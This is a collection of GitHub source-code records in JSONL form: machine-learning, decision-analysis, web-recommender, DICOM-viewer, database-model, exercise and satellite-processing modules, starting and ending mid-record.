path.exists():\n return True\n else:\n return False\n\n def save_model(self):\n \"\"\"Save the model\"\"\"\n self.model.to_disk (self.model_path)\n","repo_name":"emileKing/nova-bot","sub_path":"nova/managers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35586415264","text":"import tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport numpy as np\n\n\"\"\"\n[[0,0], -> [1, 0, 0] 기타\n [1,0], -> [0, 1, 0] 포유류\n [1,1], -> [0, 0, 1] 조류\n [0,0], -> [1, 0, 0] 기타\n [0,0], -> [1, 0, 0] 기타\n [0,1] -> [0, 0, 1] 조류\n\"\"\"\n\nclass Mammal:\n @staticmethod\n def execute():\n # [털, 날개] -> 기타, 포유류, 조류\n x_data = np.array(\n [[0, 0],\n [1, 0],\n [1, 1],\n [0, 0],\n [0, 0],\n [0, 1]\n ]\n )\n y_data = np.array(\n [[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1],\n [1, 0, 0],\n [1, 0, 0],\n [0, 0, 1]\n ]\n )\n\n X = tf.placeholder(tf.float32)\n Y = tf.placeholder(tf.float32)\n W = tf.Variable(tf.random_uniform([2, 3], -1, 1.))\n # -1 all\n # nn은 2차원으로 [입력층(특성), 출력층(레이블)] -> [2,3]\n # tf에는 변수타입 3개. placeholder는 쓰지않게 되었으나 1년은 사용될듯.\n # tf.placeholder 는 개발자가 지정해주는 값. tf.Variable는 tf내부에서 주는값.\n # W 는 내부에서 계속 바뀌는 값. X값은 리스트로 있고 내부에 투입되면 상수처럼 처리됨.\n # 내부에서는 W가 변수처럼 계속 바뀜\n # nn은 W의 수식안에 있는 tf 안에 존재 (tf내부값)\n\n b = tf.Variable(tf.zeros([3]))\n # b는 편향 bias\n # b는 각 레이어의 아웃풋 갯수로 결정함\n\n L = tf.add(tf.matmul(X, W), b) # X와 W의 곱을 b와 합산\n L = tf.nn.relu(L) # activation 함수인 relu추가\n model = tf.nn.softmax(L)\n \"\"\"\n softmax 함수는 다음 처럼 결과값을 전체 합이 1인 확률로 만들어주는 함수 (scaling)\n 예) [8.04, 2.76, -6.52] -> [0.53, 0.24, 0.23] \n \"\"\"\n print(f'모델 내부 보기 {model}')\n cost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(model), axis=1))\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01) # 경사하강법. 미분으로 기울기가 0이 되는 순간을 잡아내는 것\n train_op = optimizer.minimize(cost)\n #비용함수를 최소화시키면 (= 경사도를 0으로 만들면) 그 값이 최적화 된다\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n for step in range(100):\n sess.run(train_op, {X: x_data, Y: y_data})\n if (step + 1) % 10 == 0:\n print(step +1, sess.run(cost, {X: x_data, Y: y_data}))\n\n # 결과 확인\n prediction = tf.argmax(model, 1)\n target = tf.argmax(Y, 1)\n print(f' 예측값 {sess.run(prediction, {X: x_data})}')\n print(f' 실제값 {target, { Y: y_data}}')\n is_correct = tf.equal(prediction, target)\n accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n print(f' 정확도: %.2f' % sess.run(accuracy * 100, {X: x_data, Y: y_data}))\n\nif __name__ == '__main__':\n Mammal.execute()\n # static으로 걸어두었으므로 생성자 없이 직접실행 가능","repo_name":"smile2019kr/TF_2020","sub_path":"ai/mammal.py","file_name":"mammal.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19279769772","text":"\"\"\"\n This module computes the assignments of given alternatives to categories\n using Promethee Tri method.\n\n Implementation and naming of conventions are taken from\n :cite:p:'FigueiraDeSmetBrans2004' and :cite:p:'ArazOzkarahan2007'.\n\"\"\"\n\nimport pandas as pd\nfrom typing import List, Tuple\nfrom core.promethee_flow import compute_single_criterion_net_flows\nfrom core.input_validation import promethee_tri_validation\n\n__all__ = [\"calculate_prometheetri_sorted_alternatives\"]\n\n\ndef _calculate_criteria_net_flows(\n alternatives_partial_preferences: Tuple[pd.DataFrame, pd.DataFrame],\n profiles_partial_preferences: pd.DataFrame) -> \\\n Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"\n This function calculates criteria net flows for profiles and alternatives.\n\n :param alternatives_partial_preferences: Tuple with pd.DataFrame with\n alternatives names as index and profiles names as columns and pd.DataFrame\n objects with profiles names as index and alternatives names as columns\n :param profiles_partial_preferences: pd.DataFrame with profiles names as\n index and profiles names as columns\n\n :return: Tuple with pd.DataFrame with profiles names as index and criteria\n names as columns and pd.DataFrame objects with alternatives names as index\n and criteria names as columns\n \"\"\"\n profiles_criteria_net_flows = compute_single_criterion_net_flows(\n profiles_partial_preferences)\n\n alternatives_criteria_net_flows = compute_single_criterion_net_flows(\n alternatives_partial_preferences)\n\n return profiles_criteria_net_flows, alternatives_criteria_net_flows\n\n\ndef _calculate_deviations(alternatives: List[str],\n criteria_weights: pd.Series,\n profiles_criteria_net_flows: pd.DataFrame,\n alternatives_criteria_net_flows: pd.DataFrame,\n use_marginal_value: bool = True) -> pd.DataFrame:\n \"\"\"\n This function calculates deviation for each alternative and each profile.\n\n :param alternatives: List with alternatives names as strings\n :param criteria_weights: Series with weights of each criterion\n :param profiles_criteria_net_flows: pd.DataFrame with profiles names as\n index and criteria names as columns\n :param alternatives_criteria_net_flows: pd.DataFrame with alternatives\n names as index and criteria names as columns\n :param use_marginal_value: Boolean which describe whether deviation\n should be calculated as absolute value or not\n\n :return: pd.DataFrame with alternatives as index and profiles as columns\n \"\"\"\n\n deviations = pd.DataFrame(columns=profiles_criteria_net_flows.index,\n index=alternatives, dtype=float)\n\n for alternative, alternative_row in \\\n alternatives_criteria_net_flows.iterrows():\n for profile, profile_row in profiles_criteria_net_flows.iterrows():\n # Check if deviations should be calculated as absolute values\n if use_marginal_value:\n deviations.loc[alternative, profile] = (\n criteria_weights *\n abs(alternative_row - profile_row)).sum()\n else:\n deviations.loc[alternative, profile] = (criteria_weights * (\n alternative_row - profile_row)).sum()\n\n return deviations\n\n\ndef _assign_alternatives_to_classes_with_minimal_deviation(\n categories: List[str],\n alternatives: List[str], deviations: pd.DataFrame,\n assign_to_better_class: bool = True) -> pd.Series:\n \"\"\"\n This function assigns every alternative to class with minimal deviation\n for pair alternative, class.\n\n :param categories: List with categories names as strings\n :param alternatives: List with alternatives names as strings\n :param deviations: pd.DataFrame with alternatives as index and profiles\n as columns\n :param assign_to_better_class: Boolean which describe preference of\n the DM in final alternative assignment if total distance is equal\n cut_point value.\n\n :return: pd.Series with assignments as values\n \"\"\"\n classification = pd.Series(index=alternatives, dtype=str)\n for alternative, alternative_row in deviations.iterrows():\n if assign_to_better_class:\n classification[alternative] = categories[alternative_row.argmin()]\n else:\n classification[alternative] = categories[\n alternative_row[::-1].argmin()]\n\n return classification\n\n\ndef calculate_prometheetri_sorted_alternatives(\n categories: List[str],\n criteria_weights: pd.Series,\n alternatives_partial_preferences: Tuple[pd.DataFrame, pd.DataFrame],\n profiles_partial_preferences: pd.DataFrame,\n assign_to_better_class: bool = True,\n use_marginal_value: bool = True) -> pd.Series:\n \"\"\"\n This function sorts alternatives to proper categories\n (based on Promethee Tri).\n\n :param categories: List with categories names as strings\n :param criteria_weights: pd.Series with criterion name as index and weight\n of each criterion as values\n :param alternatives_partial_preferences: Tuple with pd.DataFrame with\n alternatives names as index and profiles names as columns and pd.DataFrame\n objects with profiles names as index and alternatives names as columns\n :param profiles_partial_preferences: pd.DataFrame with profiles names as\n index and profiles names as columns\n :param assign_to_better_class: Boolean which describe preference of\n the DM in final alternative assignment if total distance is equal\n cut_point value.\n :param use_marginal_value: Boolean which describe whether deviation \n should be calculated as absolute value or not\n\n :return: pd.Series with assignments as values\n \"\"\"\n promethee_tri_validation(categories, criteria_weights,\n alternatives_partial_preferences,\n profiles_partial_preferences,\n assign_to_better_class, use_marginal_value)\n\n alternatives = alternatives_partial_preferences[1].columns.tolist()\n\n profiles_criteria_net_flows, alternatives_criteria_net_flows = \\\n _calculate_criteria_net_flows(alternatives_partial_preferences,\n profiles_partial_preferences)\n\n deviations = _calculate_deviations(alternatives, criteria_weights,\n profiles_criteria_net_flows,\n alternatives_criteria_net_flows,\n use_marginal_value)\n\n return _assign_alternatives_to_classes_with_minimal_deviation(\n categories, alternatives, deviations, assign_to_better_class)\n","repo_name":"WAndraszyk/Construct-your-own-PROMETHEE-with-Python-for-MCDA","sub_path":"modular_parts/sorting/M19_PrometheeTri.py","file_name":"M19_PrometheeTri.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"22548437338","text":"import shelve\n\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import Puntuacion, Perfume, Usuario\nfrom .forms import PerfumeForm\nfrom .populate import populateDatabase\nfrom .recommendations import transformPrefs, calculateSimilarItems, getRecommendations\n\n\ndef recommendedPerfumes(request):\n if request.method == 'POST':\n form = PerfumeForm(request.POST)\n if form.is_valid():\n idPerfume = form.cleaned_data['id']\n perfume = get_object_or_404(Perfume, pk=idPerfume)\n shelf = shelve.open(\"dataRS.dat\")\n Prefs = shelf['ItemsPrefs']\n shelf.close()\n rankings = getRecommendations(Prefs,int(idPerfume))\n recommended = rankings[:3]\n perfumes = []\n scores = []\n for re in recommended:\n perfumes.append(Usuario.objects.get(pk=re[1]))\n scores.append(re[0])\n items = zip(perfumes, scores)\n return render(request, 'recommendationPerfumes.html', {'perfume': perfume, 'items': items})\n else:\n form = PerfumeForm()\n return render(request, 'search_perfume.html', {'form': form})\n\ndef loadDict():\n Prefs = {} # matriz de usuarios y puntuaciones a cada a items\n shelf = shelve.open(\"dataRS.dat\")\n ratings = Puntuacion.objects.all()\n for ra in ratings:\n user = int(ra.usuario_id.id)\n itemid = int(ra.perfume_id.id)\n rating = float(ra.puntuacion)\n Prefs.setdefault(user, {})\n Prefs[user][itemid] = rating\n shelf['Prefs'] = Prefs\n shelf['ItemsPrefs'] = transformPrefs(Prefs)\n shelf['SimItems'] = calculateSimilarItems(Prefs, n=10)\n shelf.close()\n\n\n# CONJUNTO DE VISTAS\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef populateDB(request):\n populateDatabase()\n return render(request, 'populate.html')\n\n\ndef loadRS(request):\n loadDict()\n return render(request, 'loadRS.html')\n","repo_name":"arh09/django_bs4_rs","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10797454788","text":"import os\nimport numpy as np\nimport natsort\nimport ctypes\nimport glob\n\nfrom threading import Thread\nfrom PIL import Image, UnidentifiedImageError\nfrom PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QPushButton, QHBoxLayout, QLabel, QGridLayout, \\\n QTextEdit, QTableWidget\nfrom PyQt5.QtGui import QPixmap, QIcon, QColor\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import uic\nfrom pydicom import read_file, dcmread\nfrom fpdf import FPDF\nfrom History import History\nfrom random import randint\n\n# importing libraries\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n\ndef read_dicom_series(directory, filepattern=\"image_*\", target_list=None):\n \"\"\" Reads a DICOM Series files in the given directory.\n Only filesnames matching filepattern will be considered\"\"\"\n\n if not os.path.exists(directory) or not os.path.isdir(directory):\n raise ValueError(\"Given directory does not exist or is a file : \" + str(directory))\n print('\\tRead Dicom', directory)\n lstFilesDCM = natsort.natsorted(glob.glob(os.path.join(directory, filepattern)))\n print('\\tLength dicom series', len(lstFilesDCM))\n # Get ref file\n RefDs = read_file(lstFilesDCM[0])\n # Load dimensions based on the number of rows, columns, and slices (along the Z axis)\n ConstPixelDims = (int(RefDs.Rows), int(RefDs.Columns), len(lstFilesDCM))\n # The array is sized based on 'ConstPixelDims'\n ArrayDicom = np.zeros(ConstPixelDims, dtype=RefDs.pixel_array.dtype)\n dicom_files = []\n # loop through all the DICOM files\n for filenameDCM in lstFilesDCM:\n # read the file\n ds = dcmread(filenameDCM)\n # store the raw image data\n ArrayDicom[:, :, lstFilesDCM.index(filenameDCM)] = ds.pixel_array\n dicom_files.append(ds)\n target_list.append(ds)\n\n return target_list\n\n\ndef dicom_date_to_str(date):\n year = date[0:4]\n month = date[4:6]\n day = date[6:8]\n return f\"{year}-{month}-{day}\"\n\n\ndef dicom_to_png(dicom_image, path, filename):\n img = dicom_image.pixel_array.astype(float) # get image array\n scaled_image = (np.maximum(img, 0) / img.max()) * 255.0\n scaled_image = np.uint8(scaled_image)\n final_image = Image.fromarray(scaled_image)\n # final_image.show()\n try:\n final_image.save(f\"{path}/{filename}.png\")\n except (FileNotFoundError, UnidentifiedImageError):\n print(\"Something went wrong while writing image. Check your filename and path\")\n return final_image\n\n\ndef read_dicom(mask_path, patient_path, patient_filepattern, mask_filepattern):\n patient_files = []\n mask_files = []\n t1 = Thread(target=read_dicom_series, args=[patient_path, patient_filepattern, patient_files])\n t2 = Thread(target=read_dicom_series, args=[mask_path, mask_filepattern, mask_files])\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n return patient_files, mask_files\n\n\n# TODO: 1- add copy to clipboard button (checked)\n# 2- add buttons functionality for history, home, save\nclass OutputWindow:\n def __init__(self, mask_path, patient_path, patient_filepattern, mask_filepattern, output_folder):\n user32 = ctypes.windll.user32\n screensize = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)\n self.title = \"Report\"\n self.width = screensize[0]\n self.height = screensize[1]\n self.app = QApplication([])\n self.window = QWidget()\n self.window.setWindowTitle(\"Detection\")\n self.window.setWindowIcon(QIcon(\"assets/logo.png\"))\n self.images = read_dicom(mask_path, patient_path, patient_filepattern, mask_filepattern)\n self.patient_dicom = self.images[0]\n self.dicom_image_index = randint(0, len(self.patient_dicom)-1)\n self.mask_dicom = self.images[1]\n self.output_folder = output_folder\n self.hs = None\n\n def create_window(self):\n self.window = QWidget()\n self.window.setWindowTitle(\"Detection\")\n self.add_layout()\n self.window.showMaximized()\n self.window.show()\n self.app.exec_()\n\n def goto_history(self):\n if not self.hs:\n self.hs = History()\n self.hs.show()\n self.window.close()\n\n def close(self):\n self.window.deleteLater()\n self.window.close()\n\n def add_layout(self):\n # Top Bar Layout\n container = QWidget()\n navbar_layout = QHBoxLayout(container)\n home_button = QPushButton('')\n home_icon = QIcon(\"assets/home.png\")\n home_button.setIcon(home_icon)\n home_button.setFlat(True)\n navbar_layout.addWidget(home_button)\n history_button = QPushButton()\n history_icon = QIcon(\"assets/history.png\")\n history_button.setIcon(history_icon)\n history_button.setFlat(True)\n history_button.clicked.connect(self.goto_history)\n navbar_layout.addWidget(history_button)\n save_button = QPushButton()\n save_icon = QIcon(\"assets/save.png\")\n save_button.setIcon(save_icon)\n save_button.setFlat(True)\n\n navbar_layout.addWidget(save_button)\n exit_button = QPushButton()\n exit_icon = QIcon(\"assets/log-out.png\")\n exit_button.setIcon(exit_icon)\n exit_button.setFlat(True)\n exit_button.clicked.connect(self.close)\n navbar_layout.addWidget(exit_button)\n container.setStyleSheet(\"background-color: grey;\")\n main_navbar_layout = QVBoxLayout()\n main_navbar_layout.addWidget(container)\n self.dicom_image_index = randint(0, len(self.patient_dicom)-1)\n pat_dicom_img = self.patient_dicom[self.dicom_image_index]\n patient_id = pat_dicom_img.data_element(\"PatientID\").value\n patient_name = pat_dicom_img.data_element('PatientName').value\n # Dicom Viewer Section\n dicom_viewer_layout = QVBoxLayout()\n dicom_viewer_layout.addWidget(QLabel(\"Dicom Preview\"))\n dicom_images_widget = QWidget()\n dicom_images_widget.setStyleSheet(\"background-color: grey;\")\n dicom_images_layout = QVBoxLayout(dicom_images_widget)\n dicom_to_png(pat_dicom_img, \"temp/images\", patient_name)\n pat_image_label = QLabel()\n pat_image = QPixmap(f\"temp/images/{patient_name}.png\")\n pat_image_label.setPixmap(pat_image)\n dicom_images_layout.addWidget(pat_image_label)\n # - model result\n mask_image_label = QLabel()\n index = randint(0, len(self.mask_dicom)-1)\n mask_dicom_img = self.mask_dicom[index]\n dicom_to_png(mask_dicom_img, \"temp/images\", f\"{patient_name}_mask\")\n\n mask_image = QPixmap(f\"temp/images/{patient_name}_mask.png\")\n mask_image_label.setPixmap(mask_image)\n mask_image_label.clear()\n mask_image_label.setPixmap(mask_image)\n dicom_images_layout.addWidget(mask_image_label)\n dicom_viewer_layout.addWidget(dicom_images_widget)\n image_nav_layout = QHBoxLayout()\n prev_button = QPushButton()\n prev_icon = QIcon(\"assets/left-arrow.png\")\n prev_button.setIcon(prev_icon)\n image_nav_layout.addWidget(prev_button)\n gallery_info_label = QLabel(\"1 of 20\")\n gallery_info_label.setAlignment(Qt.AlignCenter)\n image_nav_layout.addWidget(gallery_info_label)\n next_button = QPushButton()\n next_icon = QIcon(\"assets/right-arrow.png\")\n next_button.setIcon(next_icon)\n image_nav_layout.addWidget(next_button)\n dicom_viewer_layout.addLayout(image_nav_layout)\n # Report Section\n report_layout = QVBoxLayout()\n report_layout.addWidget(QLabel(\"Report\"))\n # - patient details\n patient_details_layout = QGridLayout()\n patient_details_layout.addWidget(QLabel(\"Patient Details\"), 0, 0)\n patient_name_layout = QHBoxLayout()\n patient_name_layout.addWidget(QLabel(\"Patient Name\"))\n pat_name_text = QTextEdit(str(pat_dicom_img.data_element(\"PatientName\").value))\n pat_name_text.setFixedWidth(1200)\n pat_name_text.setAlignment(Qt.AlignLeft)\n pat_name_text.setFixedHeight(30)\n patient_name_layout.addWidget(pat_name_text)\n patient_details_layout.addLayout(patient_name_layout, 1, 0)\n patient_id_layout = QHBoxLayout()\n patient_id_layout.addWidget(QLabel(\"Patient ID\"))\n pat_id_text = QTextEdit(str(patient_id))\n pat_id_text.setFixedHeight(30)\n pat_id_text.setFixedWidth(1200)\n pat_id_text.setAlignment(Qt.AlignLeft)\n patient_id_layout.addWidget(pat_id_text)\n patient_details_layout.addLayout(patient_id_layout, 2, 0)\n pat_date_layout = QHBoxLayout()\n pat_date_layout.addWidget(QLabel(\"Birth Date\"))\n birth_date = dicom_date_to_str(pat_dicom_img.data_element(\"PatientBirthDate\").value)\n pat_date_text = QTextEdit(str(birth_date))\n pat_date_text.setFixedHeight(30)\n pat_date_text.setFixedWidth(1200)\n pat_date_text.setAlignment(Qt.AlignLeft)\n pat_date_layout.addWidget(pat_date_text)\n patient_details_layout.addLayout(pat_date_layout, 3, 0)\n study_date_layout = QHBoxLayout()\n study_date_layout.addWidget(QLabel(\"Study Date\"))\n study_date = dicom_date_to_str(pat_dicom_img.data_element(\"StudyDate\").value)\n study_date_text = QTextEdit(str(study_date))\n study_date_text.setFixedHeight(30)\n study_date_text.setFixedWidth(1200)\n study_date_text.setAlignment(Qt.AlignLeft)\n study_date_layout.addWidget(study_date_text)\n patient_details_layout.addLayout(study_date_layout, 4, 0)\n report_layout.addLayout(patient_details_layout)\n # - detection details\n detection_layout = QVBoxLayout()\n detection_header_layout = QHBoxLayout()\n detection_header_layout.addWidget(QLabel(\"Detection\"))\n cp_button = QPushButton()\n cp_icon = QIcon(\"assets/copy.png\")\n cp_button.setIcon(cp_icon)\n cp_button.setFlat(True)\n detection_header_layout.addWidget(cp_button)\n detection_layout.addLayout(detection_header_layout)\n # - model result\n detection = \"1- A tumor has been detected in liver.
2- A tumor has been detected in liver.

\" \\\n \"Summary:
Liver has two tumors.\"\n detection_text = QTextEdit(detection)\n detection_text.setFixedHeight(100)\n detection_layout.addWidget(detection_text)\n report_layout.addLayout(detection_layout)\n # - status\n status_layout = QVBoxLayout()\n status_layout_label = QHBoxLayout()\n status_layout_label.addWidget(QLabel(\"Status\"))\n status_image_label = QLabel()\n status_image = QPixmap(\"assets/red_circle.png\")\n status_image_label.setPixmap(status_image)\n status_layout_label.addWidget(status_image_label)\n cp_button = QPushButton()\n cp_icon = QIcon(\"assets/copy.png\")\n cp_button.setIcon(cp_icon)\n cp_button.setFlat(True)\n status_layout_label.addWidget(cp_button)\n status_layout.addLayout(status_layout_label)\n status = \"Abnormal\"\n status_text = QTextEdit(status)\n status_text.setFixedHeight(100)\n status_layout.addWidget(status_text)\n report_layout.addLayout(status_layout)\n\n save_button.clicked.connect(\n lambda: self.save(patient_name, patient_id, {\"Study Date\": study_date,\n \"Birth Date\": birth_date}))\n # Main layout of the window\n main_layout = QVBoxLayout()\n bottom_layout = QHBoxLayout()\n bottom_layout.addLayout(dicom_viewer_layout)\n bottom_layout.addLayout(patient_details_layout)\n bottom_layout.addLayout(report_layout)\n main_layout.addLayout(main_navbar_layout)\n main_layout.addLayout(bottom_layout)\n main_layout.addLayout(report_layout)\n self.window.setLayout(main_layout)\n\n def save(self, patient_name, patient_id, details: dict):\n pdf = FPDF()\n pdf.add_page()\n pdf.set_font(\"Arial\", size=15)\n\n pdf.cell(200, 10, txt=\"Detection Result\", ln=1, align='C')\n pdf.cell(200, 10, txt=f\"Patient Name: {patient_name}\", ln=2, align='C')\n pdf.cell(200, 10, txt=f\"Patient ID: {patient_id}\", ln=3, align='C')\n ln_c = 4\n for cell in details.keys():\n pdf.cell(200, 5, txt=f\"{cell}: {details[cell]}\", ln=ln_c, align='C')\n ln_c += 1\n pdf.cell(200, 5, txt=f\"\", ln=ln_c, align='C')\n pdf.image(name=\"temp/images/liver_17^patient_mask.png\")\n pdf.output(dest='F', name=f\"{self.output_folder}{patient_name}_{patient_id}.pdf\")\n\n @staticmethod\n def preview_dicom(pat_dicom_img, mask_dicom_img, patient_name):\n # Dicom Viewer Section\n dicom_viewer_layout = QVBoxLayout()\n dicom_viewer_layout.addWidget(QLabel(\"Dicom Preview\"))\n dicom_images_widget = QWidget()\n dicom_images_widget.setStyleSheet(\"background-color: grey;\")\n dicom_images_layout = QVBoxLayout(dicom_images_widget)\n dicom_to_png(pat_dicom_img, \"temp/images\", patient_name)\n pat_image_label = QLabel()\n pat_image = QPixmap(f\"temp/images/{patient_name}.png\")\n pat_image_label.setPixmap(pat_image)\n dicom_images_layout.addWidget(pat_image_label)\n # - model result\n mask_image_label = QLabel()\n dicom_to_png(mask_dicom_img, \"temp/images\", f\"{patient_name}_mask\")\n mask_image = QPixmap(f\"temp/images/{pat_dicom_img.data_element('PatientName').value}_mask.png\")\n mask_image_label.setPixmap(mask_image)\n dicom_images_layout.addWidget(mask_image_label)\n dicom_viewer_layout.addWidget(dicom_images_widget)\n\n @staticmethod\n def set_item_background(item, grade):\n if grade > 1:\n item.setBackground(QColor(255, 0, 0))\n elif grade == 1:\n item.setBackground(QColor(255, 255, 0))\n else:\n item.setBackground(QColor(0, 255, 0))\n\n @staticmethod\n def set_widget_background(item, grade):\n if grade > 1:\n item.setStyleSheet(\"background-color: red;\")\n elif grade == 1:\n item.setStyleSheet(\"background-color: rgb(255, 255, 0);\")\n else:\n item.setStyleSheet(\"background-color: rgb(0, 255, 0);\")\n\n\n# script to be written when user clicks start\nif __name__ == \"__main__\":\n ow = OutputWindow(\"C:\\\\Users\\\\rasta\\\\Downloads\\\\Compressed\\\\3Dircadb1.17\\\\3Dircadb1.17\\\\MASKS_DICOM\\\\liver\",\n # \"C:\\\\Users\\\\rasta\\\\Downloads\\\\Compressed\\\\3Dircadb1.17\\\\3Dircadb1.17\\\\PATIENT_DICOM\",\n \"C:\\\\Users\\\\rasta\\\\Downloads\\\\liver 6\\\\liver 6\\\\^95020329_20210906\",\n \"FILE*\", \"image_*\", \"test/output_folder/\")\n ow.create_window()\n","repo_name":"alireza-da/TraumaDetectionProject","sub_path":"src/visualize_output_v2.py","file_name":"visualize_output_v2.py","file_ext":"py","file_size_in_byte":14761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34279917385","text":"import json\nfrom bson import json_util\nimport datetime\nfrom mongoengine import Document, EmbeddedDocument, connect\nfrom mongoengine import StringField, ReferenceField, ListField, URLField, EmbeddedDocumentField, EmbeddedDocumentListField, DictField, BooleanField, IntField, DateTimeField\n\n\nclass DogData(Document):\n owner_name = StringField(default='', required=True)\n dog_name = StringField(default='', required=True)\n dog_id = IntField(default=0, required=True, unique=True)\n\n def to_json(self):\n jsonObj = {}\n jsonObj[\"owner_name\"] = self.owner_name\n jsonObj[\"dog_name\"] = self.dog_name\n jsonObj[\"dog_id\"] = self.dog_id\n return jsonObj\n\n\nclass Record(Document):\n dog_data = ReferenceField(DogData, required=True)\n classify_data = ListField(DictField(), default=[])\n image_path = StringField(default='', required=True)\n timestamp = DateTimeField(required=True, default=datetime.datetime.now)\n\n def to_json(self):\n jsonObj = {}\n jsonObj[\"dog_data\"] = self.dog_data.to_json()\n jsonObj[\"classify_data\"] = self.classify_data or []\n jsonObj[\"image_path\"] = self.image_path\n jsonObj[\"timestamp\"] = self.timestamp.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return jsonObj\n","repo_name":"kongyay/DogBloodWeb","sub_path":"server_dog/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14633558730","text":"\"\"\"\nSmoothing the Weather\nProblem #57\nhttp://www.codeabbey.com/index/task_view/smoothing-the-weather\n\nLittle Merlin wants to become a meteorologist. He measures the temperature of the air each hour so that after several days he has a long sequence of values.\n\nHowever, his instruments are not ideal so the measurements are not exact - they randomly jump up and down by several degrees from the real values.\n\nObserving this, Merlin decided to make his data more smooth. To achieve this he only needs every value to be substituted by the average of it and its two neighbors. For example, if he have the sequence of 5 values like this:\n\n3 5 6 4 5\nThen the second (i.e. 5) should be substituted by (3 + 5 + 6) / 3 = 4.66666666667,\nthe third (i.e. 6) should be substituted by (5 + 6 + 4) / 3 = 5,\nthe fourth (i.e. 4) should be substituted by (6 + 4 + 5) / 3 = 5.\nBy agreement, the first and the last values will remain unchanged.\n\nAt the picture above the blue line shows unprocessed data while red represents the smoothing.\n\nYou are to write the program which helps Little Merlin in this whimsical algorithm of digital signal processing.\n\nInput data will contain the length of the sequence in the first line.\nThe second line will contain the measurements itself.\nAnswer should contain the processed sequence. All values should be calculated to precision of 1e-7 or better.\n\"\"\"\ncount = int(input())\n\nnums = input().split()\n\nnums = [float(x) for x in nums]\n\nsmoothed = []\n\nfor k,v in enumerate(nums):\n if k is 0 or k is len(nums)-1:\n smoothed.append(v)\n else:\n a = v\n b = nums[k-1]\n c = nums[k+1]\n smoothed.append((a + b + c)/3)\n\nsmoothed = [str(x) for x in smoothed]\n\nprint(' '.join(smoothed))","repo_name":"jason-ellis/codeabbey","sub_path":"python3/057.py","file_name":"057.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"8142069562","text":"import xmltodict\nfrom configs import server_config, ml_config, path_config\nimport json\nimport requests\nimport shutil\nfrom subprocess import run\nfrom pathlib import Path\nfrom errors import MissingProductError\nfrom utils.common import ( # pylint: disable=no-name-in-module\n xml_get,\n clear,\n to_standard_datetime_str,\n)\nfrom utils.s3 import s3copy # pylint: disable=no-name-in-module\nfrom alchemy import (\n Sns,\n Grd,\n Ocn,\n Inference,\n Posi_Poly,\n Vessel,\n Coincident,\n Slick,\n Eez,\n)\nfrom ml.raster_processing import resize\nfrom ml.vector_processing import geojson_to_ewkt, shape_to_ewkt, wk_to_shapely\nimport shapely.geometry as sh\n\n\nclass Sns_Ext(Sns):\n def __init__(self, raw):\n # DB Columns\n self.messageid = raw[\"MessageId\"]\n self.subject = raw[\"Subject\"]\n self.timestamp = raw[\"Timestamp\"]\n\n # Calculated\n self.raw = raw\n self.message = json.loads(raw[\"Message\"])\n\n\nclass Grd_Ext(Grd):\n def __init__(self, sns):\n # DB Columns\n self.sns = sns\n self.pid = sns.message[\"id\"]\n self.uuid = sns.message[\"sciHubId\"]\n self.absoluteorbitnumber = sns.message[\"absoluteOrbitNumber\"]\n self.polarization = sns.message[\"polarization\"]\n self.mode = sns.message[\"mode\"]\n self.s3ingestion = sns.message[\"s3Ingestion\"]\n self.scihubingestion = sns.message[\"sciHubIngestion\"]\n self.starttime = sns.message[\"startTime\"]\n self.stoptime = sns.message[\"stopTime\"]\n self.geometry = geojson_to_ewkt(sns.message[\"footprint\"])\n\n # Calculated\n self.sns_msg = sns.message\n self.s3_dir = f\"s3://sentinel-s1-l1c/{self.sns_msg['path']}/measurement/\"\n self.load_from_field = \"pid\"\n\n # Placeholders\n self.filepath = None\n\n def download_grd_tiff(self, dest_dir=None):\n \"\"\"Creates a local directory and downloads a GeoTiff (often ~700MB)\n \"\"\"\n if server_config.VERBOSE:\n print(\"Downloading GRD\")\n\n dest_dir = (\n Path(dest_dir)\n if dest_dir\n else Path(path_config.LOCAL_DIR) / \"temp\" / self.pid\n )\n self.file_path = dest_dir / f\"{self.sns_msg['mode'].lower()}-vv.tiff\"\n s3copy(self.file_path.name, self.s3_dir, dest_dir)\n self.is_downloaded = True\n return self.file_path\n\n def cleanup(self):\n \"\"\"Delete any local directory made to store the GRD\n \"\"\"\n if self.file_path.parent.exists():\n shutil.rmtree(self.file_path.parent)\n\n\nclass Ocn_Ext(Ocn):\n def __init__(self, grd, ocn_xml):\n # DB Columns\n self.grd = grd\n self.pid = ocn_xml.get(\"title\")\n self.uuid = ocn_xml.get(\"id\")\n self.summary = ocn_xml.get(\"summary\")\n self.producttype = xml_get(ocn_xml.get(\"str\"), \"producttype\")\n self.filename = xml_get(ocn_xml.get(\"str\"), \"filename\")\n\n # Calculated\n self.file_path = None\n\n\nclass 